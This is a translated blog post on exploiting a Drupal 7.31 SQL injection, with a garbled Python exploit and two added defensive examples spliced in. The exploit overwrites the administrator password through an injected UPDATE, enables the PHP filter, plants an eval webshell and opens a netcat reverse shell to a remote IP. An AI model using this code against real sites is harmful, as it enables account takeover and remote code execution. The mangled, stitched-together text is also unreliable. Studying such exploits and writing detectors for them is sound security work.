Drupal 7.31 SQL injection vulnerability exploitation and EXP
This article and the program were written a few days before being published. The Drupal hole does not seem to have attracted much attention, so I did not pay it much attention either. To be honest, though, this hole is very powerful, which is surely not what Drupal itself expected.
0x00
First of all, this vulnerability is serious and Drupal is widely deployed, so a scanner would find many vulnerable hosts; but mass exploitation could do real damage to other people's sites, so I only wrote a single-target Exp. Even so, the hole seems to be treated as unimportant, which is quite inappropriate.
0x01
I have already explained the vulnerability principle and the POC on my blog. Here I focus on the exploitation process: taking the effect of the POC further, mainly into remote code execution and GetShell.
Remote code execution:
1. Log in as the super administrator.
2. Enable the site's PHP Filter module.
3. Create an article, choose the PHP_CODE text format (edit the PHP code), and preview it.
4. Once the preview page loads, the code has been executed.
In the EXP this corresponds to the codeExecution function of the DrupalSQLin class, which automates the steps above. This part was the hardest to write: the trouble was getting requests to send the attachment, and in the end I had to assemble the multipart POST body by hand. The structure of the assembled request is as follows:
When debugging the program, burpsuite is a very effective aid: with it you can see clearly the packet format and field contents of every interaction.
GetShell:
1. Log in as the super administrator.
2. Enable the site's PHP Filter module.
3. Create a block and edit its PHP code.
4. Save it with the PHP_CODE text format.
The POST request structure is as follows:
The disadvantage of sending packets from Python is that it is not intuitive: you cannot tell whether your packet structure is correct. Here you can use the proxies parameter of the requests module to point the proxy at burpsuite and analyze and debug the traffic there. Note, however, that the new-block method of obtaining a shell may be limited by permissions.
When constructing the request there are two fields, form_build_id and form_token. These are the tokens Drupal issues to prevent CSRF (similar to Django's csrf protection). Before sending the request you must fetch these two values, which takes a small crawler.
Another key point is to save the cookie after the simulated login, because the subsequent requests must carry the admin cookie; otherwise an error occurs.
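To make clear what form_build_id and form_token actually protect against, here is an added example (not code from the original post, and not Drupal core's own API) of a session-bound anti-CSRF token: an HMAC over the form id keyed with the site's private key combined with the user's session id. The names SITE_PRIVATE_KEY, form_token and check_form_token are assumptions made for this illustration.

```python
"""Session-bound form tokens of the kind a Drupal form_token represents.

Added illustration, not Drupal core code. A token is valid only for the
session that requested the form and only for that form id, so a request
forged from another origin (which cannot read the token) is rejected.
"""
import hashlib
import hmac
import secrets

# Constructed secret for this example; a real site keeps its private key in settings.
SITE_PRIVATE_KEY = b"constructed-private-key-do-not-reuse"


def form_token(session_id: str, form_id: str) -> str:
    """Derive a token bound to both the session and the form being submitted."""
    key = SITE_PRIVATE_KEY + session_id.encode()
    return hmac.new(key, form_id.encode(), hashlib.sha256).hexdigest()


def check_form_token(session_id: str, form_id: str, presented: str) -> bool:
    """Recompute the token for this session/form and compare in constant time."""
    expected = form_token(session_id, form_id)
    return hmac.compare_digest(expected, presented)


def demo() -> dict:
    """Show which submissions pass: same session and form only."""
    admin_session = secrets.token_hex(16)   # the cookie saved after the admin login
    other_session = secrets.token_hex(16)   # a session that never loaded the form
    tok = form_token(admin_session, "system_modules")
    return {
        "same_session_ok": check_form_token(admin_session, "system_modules", tok),
        "other_session_rejected": not check_form_token(other_session, "system_modules", tok),
        "other_form_rejected": not check_form_token(admin_session, "block_add_block_form", tok),
    }


if __name__ == "__main__":
    print(demo())
```

The caveat for defenders: this token only stops cross-site forgery. Once an attacker holds the admin cookie, as happens after the password overwrite described above, the tokens are simply fetched from the page like any legitimate client would, so form tokens are not a mitigation for this injection; the fix is the patched database layer.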
0x02
Command execution result: the reverse shell is received on the local listening port.
Test environment: local test.
Program execution:
The main thread blocks while waiting for the reverse shell.
Reverse shell result:
0x03
This vulnerability is very powerful and does great harm to the target host; it also involves overwriting a user account and changing the site's original settings, so I am not going to share the code in full here.
If you want to use it quietly, a lot of auxiliary work is needed. For example, enabling the PHP filter requires first crawling the site's existing module configuration, and the way the administrator account is obtained has also been improved.
The following code is released:
Simulated login function:
Enable PHP Filter:
Code execution:
0x04
Writing this kind of web EXP requires attention to a great many details; I even used burpsuite during debugging, and the whole process made me quite sick of it.
In addition, the program is only used for security research and study exchanges. Please do not use it for illegal purposes.
0x05
Here is the program with some important parts deleted. It no longer runs as-is and is shared only for learning and exchange:
```python
# Coding = utf-8import requestsimport reimport sysimport socketimport extends urllib2import cookielibimport mimetypesimport extends DrupalSQLin (): ''' get super Administrator account password (overwrite) ''' def getAdmin (self, url ): try: # admin is owned, pass is thanksdata = {"name [0; update users set name = 'admin ', pass = '$ S $ DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld' where uid = 1; #] ": 'admin'," name [0] ":" 111111 ", "pass": "shit2 "," Test2 ":" test "," form_build_id ":" "," form_id ":" user_login_block "," op ":" Log + in "} r = requests. post (url, timeout = 10, data = data) page = r. contentif page. count ("mb_strlen () expects parameter 1 to be string ")! = 0: print "[+] Get Admin Success: admin/thanks" failed t Exception, e: print "Exception exists: % s "% ereturn None ''' use the super administrator to log on to ''' def login (self, url): # get tokenpattern = re. compile (r'name = "form_build_id" value = "(. +) "') r = requests. get (url) form_build_id = pattern. findall (r. content) [0] login_data = {'name': 'admin', 'pass': 'thank', 'form _ build_id ': form_build_id, # csrf token 'form _ id': 'user _ login_block ', 'Op': 'Lo G + in '} r = requests. post (url, data = login_data) page = r. contentif page. count ("Log out ")! = 0: print '[+] Admin Log in Success! '# Obtain cookiescj = cookielib. LWPCookieJar () opener = urllib2.build _ opener (urllib2.HTTPCookieProcessor (cj) login_path = 'HTTP: // 127.0.0.1/drupal-7.31/'pattern = re. compile (r'name = "form_build_id" value = "(. +) "') r = requests. get (login_path) form_build_id = pattern. findall (r. content) [0] data = {'name': 'admin', 'pass': 'thank', 'form _ build_id ': form_build_id, # csrf token 'form _ id': 'user _ login_block ', 'Op': 'Log + in '} Post_data = urllib. urlencode (data) request = urllib2.Request (login_path, post_data) html = opener. open (request ). read () if cj: cj.save('cookiefile.txt ') else: print 'get Cookies Error, Exploit Failed! 'Sys. 
exit () f = open('cookiefile.txt ', 'R') cookiesfile = f. read () pattern = re. compile (r'set-Cookie3: (. ++ ?) = (. + ?); ') Ret = pattern. findall (cookiesfile) cookies = {ret [0] [0]: str (ret [0] [1]). replace ('"','')} return cookieselse: return None ''' enable PHP Filter ''' def openPhpFilter (self, url): cookies = self. login (url) url = "% s" % (url ,"? Q = admin/modules/list/confirm ") pattern_id = re. compile (r'name = "form_build_id" value = "(. +) "') pattern_token = re. compile (r'name = "form_token" value = "(. +) "') r = requests. get (url, cookies = cookies) form_build_id = pattern_id.findall (r. content) [0] # csrf tokenform_token = pattern_token.findall (r. content) [0] post_data = {'Les les [Core] [php] [enable] ': '1', 'Les les [Core] [color] [enable]': '1', 'Les les [Core] [comment] [Enable] ': '1', 'Les les [Core] [contextual] [enable]': '1', 'Les les [Core] [dashboard] [enable] ': '1', 'Les les [Core] [dblog] [enable] ': '1', 'Les les [Core] [field_ui] [enable]': '1 ', 'modules [Core] [help] [enable] ': '1', 'modules [Core] [list] [enable]': '1 ', 'modules [Core] [menu] [enable] ': '1', 'modules [Core] [number] [enable]': '1 ', 'modules [Core] [overlay] [enable] ': '1', 'modules [Core] [path] [enable]': '1 ', 'modulles [Core] [rdf] [enabl E] ': '1', 'Les les [Core] [search] [enable]': '1', 'Les les [Core] [shortcut cut] [enable] ': '1', 'Les les [Core] [toolbar] [enable] ': '1', 'form _ build_id': form_build_id, 'form _ token': form_token, 'form _ id': 'System _ Les ', 'Op': 'save + configuration'} try: r = requests. post (url, data = post_data, cookies = cookies) print '[+] Open PHP Filter Success! 'Failed t Exception, e: print "[+] Exception: % s Exploit Failed! "% Esys. exit () ''' get webshell :? Q = admin/structure/block/add''' def getShell (self, url, content = "<? Php @ eval ($ _ POST ['cmd']);?> "): Print" [+] Get Shell Module \ nNotice: You can use this part get a shell. "cookies = self. login (url) url = "% s" % (url ,"? 
Q = admin/structure/block/add & render = overlay ") pattern_id = re. compile (r'name = "form_build_id" value = "(. +) "') pattern_token = re. compile (r'name = "form_token" value = "(. +) "') r = requests. get (url, cookies = cookies) form_build_id = pattern_id.findall (r. content) [0] # csrf tokenform_token = pattern_token.findall (r. content) [0] post_data = {'title': '', 'info': 'shit2', 'body [value] ': content, 'body [format]': 'php _ Code','re Gions [bartik] ':'-1', 'regions [seven] ':'-1', 'visibility ': '0', 'pages ':'', 'custom': '0', 'visibility _ active_tab ': 'edit-path', 'form _ build_id': form_build_id, 'form _ token': form_token, 'form _ id': 'block _ add_block_form ', 'Op': 'save + Block'} rp = requests. post (url, data = post_data) page_content = rp. contentif page_content.count ("created ")! = 0: print 'get Shell Success: % s /? Q = admin/structure/block & render = overlay '% urlreturn "% s /? Q = admin/structure/block "% urlelse: print 'get Shell Failed! ''' Remote Code Execution :? Q = node/add/article ''' def codeExecution (self, url, code ): print ''' [+] Code Execution ModulePlease make sure that keep nc listener opening when you want to get a reverse shell.1.First, you need to exe nc-vv-l-p <port> 2. then, you can run this script with command 'nc <ip> <port>-e/bin/bash 'tips: If you want a echo, add reg by youself. '''cookies = self. login (url) url = "% s" % (url ,"? Q = node/add/article ") r = requests. get (url, cookies = cookies) pattern_id = re. compile (r'name = "form_build_id" value = "(. +) "') pattern_token = re. compile (r'name = "form_token" value = "(. +) "') form_build_id = pattern_id.findall (r. content) [0] # csrf token # concatenate attachmentBOUND = mimetools. choose_boundary () content_type = "multipart/form-data; boundary = % s" % BOUNDCRLF = "\ r \ n" fields = {'title': 'chongrui ', 'Field _ tags [und] ': CRLF, 'body [und] [0] [summary]': CRLF, 'body [und] [0] [value] ':' <? 
Php echo shell_exec ("% s") ;?> '% Code, 'body [und] [0] [format]': 'php _ Code', 'field _ image [und] [0] [fid] ': '0', 'field _ image [und] [0] [display] ': '1', 'changed': CRLF, 'form _ build_id ': form_build_id, 'form _ token': form_token, 'form _ id': 'Article _ node_form ', 'log': CRLF, 'name': 'admin', 'date': CRLF, 'status': '1', 'promote': '1', 'additional _ settings _ active_tab ': 'edit-revision-information', 'op ': 'preview'} L = [] for k, v in fields. items (): L. append ('--' + BOUND) L. append ('\ n') L. append ('content-Disposition: form-data; name = "% s" % s' % (k, "\ n") if v! = CRLF: L. append (CRLF) L. append (v) L. append ('\ n') L. append ('% s --' % BOUND) L. append (CRLF) body = ''for x in L: body + = xheaders = {'content-type': content_type} r = requests. post (url, data = body, cookies = cookies, headers = headers) pai_echo = r. contentif pai_echo.count ("Preview trimmed version") = 0: print 'execution Error! 'Else: print' Execution Success! 'If _ name _ = '_ main _': url = "http: // 127.0.0.1/drupal-7.31/" code = "" print "Target host: % s "% urlprint 'powered by: Exploit <from 91ri Team> \ nQQ: 739858341 'exp = DrupalSQLin () # obtain admin permission exp. getAdmin (url) # enable php filterexp. openPhpFilter ("http: // 127.0.0.1/drupal-7.31/") # getshellexp. getShell (url) # code execution exp. codeExecution (url, 'c :\\\ nc.exe 10.10.10.132 10002-e c :\\\ cmd.exe ')
```
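The getAdmin step above hides its UPDATE statement inside the array key of the login form's name field (`name[0; update users set ...; #]`), so a detector that inspects only parameter values never sees it. The following is an added defensive example, not code from the original post: it walks a constructed audit log of urlencoded POST bodies and flags any parameter whose bracketed array key carries SQL statement fragments. The SQL_FRAGMENT keyword list, the log layout and the function names are assumptions made for this illustration.

```python
"""Spotting SQL injected through form-field names, as in the Drupal 7.31 login bypass.

Added defensive example (not part of the original post). Legitimate Drupal form
keys look like name[0] or modules[Core][php][enable]; a key that contains a
statement terminator, a comment marker or a DML keyword is a strong signal.
"""
import re
from urllib.parse import parse_qsl

# Metacharacters and keywords that never belong in a legitimate form array key.
SQL_FRAGMENT = re.compile(
    r"(;|--|#|/\*|\b(update|insert|delete|select|union|drop|set|where)\b)",
    re.IGNORECASE,
)
ARRAY_KEY = re.compile(r"\[([^\]]*)\]")

# Constructed sample audit records: (client, path, urlencoded POST body).
# The second record carries a shortened form of the injection shown in the post.
SAMPLE_LOG = [
    ("10.0.0.5", "/?q=node",
     "name=alice&pass=s3cret&form_id=user_login_block&op=Log+in"),
    ("10.0.0.7", "/?q=node",
     "name%5B0%3B+update+users+set+name%3D%27admin%27+where+uid%3D1%3B+%23%5D=admin"
     "&name%5B0%5D=111111&pass=x&form_id=user_login_block&op=Log+in"),
    ("10.0.0.9", "/?q=admin/modules",
     "modules%5BCore%5D%5Bphp%5D%5Benable%5D=1&form_id=system_modules"),
]


def suspicious_keys(body: str) -> list:
    """Return the parameter names in `body` whose array keys contain SQL fragments."""
    hits = []
    for name, _value in parse_qsl(body, keep_blank_values=True):
        for key in ARRAY_KEY.findall(name):
            if SQL_FRAGMENT.search(key):
                hits.append(name)
                break
    return hits


def scan(records) -> list:
    """Return (client, path, offending parameter name) for every flagged request."""
    findings = []
    for client, path, body in records:
        for name in suspicious_keys(body):
            findings.append((client, path, name))
    return findings


if __name__ == "__main__":
    for client, path, name in scan(SAMPLE_LOG):
        print("[!] %s %s suspicious form key: %s" % (client, path, name))
```

The strongest single signal is a `;` or comment marker inside a bracketed key; the keyword list is only a starting point and a key literally named `set` or `where` would trip it, so tune it to the forms your site actually serves. The third record shows that the long module-enable form the exploit submits looks entirely normal at this layer; the reliable indicator of that stage is the audit log entry for the PHP filter module being enabled by an administrator.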